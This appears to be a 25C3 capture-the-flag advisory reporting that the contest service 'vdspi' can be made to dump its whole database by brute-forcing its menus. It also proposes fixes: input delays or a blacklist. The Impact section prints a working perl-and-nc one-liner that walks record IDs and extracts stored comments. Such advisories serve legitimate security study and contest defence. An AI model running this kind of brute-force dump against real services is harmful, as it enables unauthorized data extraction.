HC's Capture the Flag website
CTF Contests
25C3-CTF
25C3-CTF final results
Advisory #119
From team Ailuropoda Melanoleucas
New advisory by : Samsa
Affected service(s): vdspi
Severity [lmh] : medium
===== Problem =====
A full database dump can be done by bruteforcing the menus.
===== Impact =====
The full database can be dumped. The range of IDs to use should
be specified to the bruteforcer which can be done in few perl
lines.
perl -e 'print "1\n";for $n(0 .. 400){print "3\n"; print $n."\n";}print "0\n0\n";' \
| nc <host> <port> \
| grep -e Comment | grep -v found | grep ment | awk -F : ' {print $2}'| cut -c 2-
===== Fix =====
A simple fix could be to add more delays on user input by
adding:
delay (CHAR_DELAY+LINE_DELAY)*40;
in Get procedure in ui.adb.
A better fix would be to keep a blacklist to keep bruteforcers
away for a while.
Rating
[0] there is a much more practical and effective fix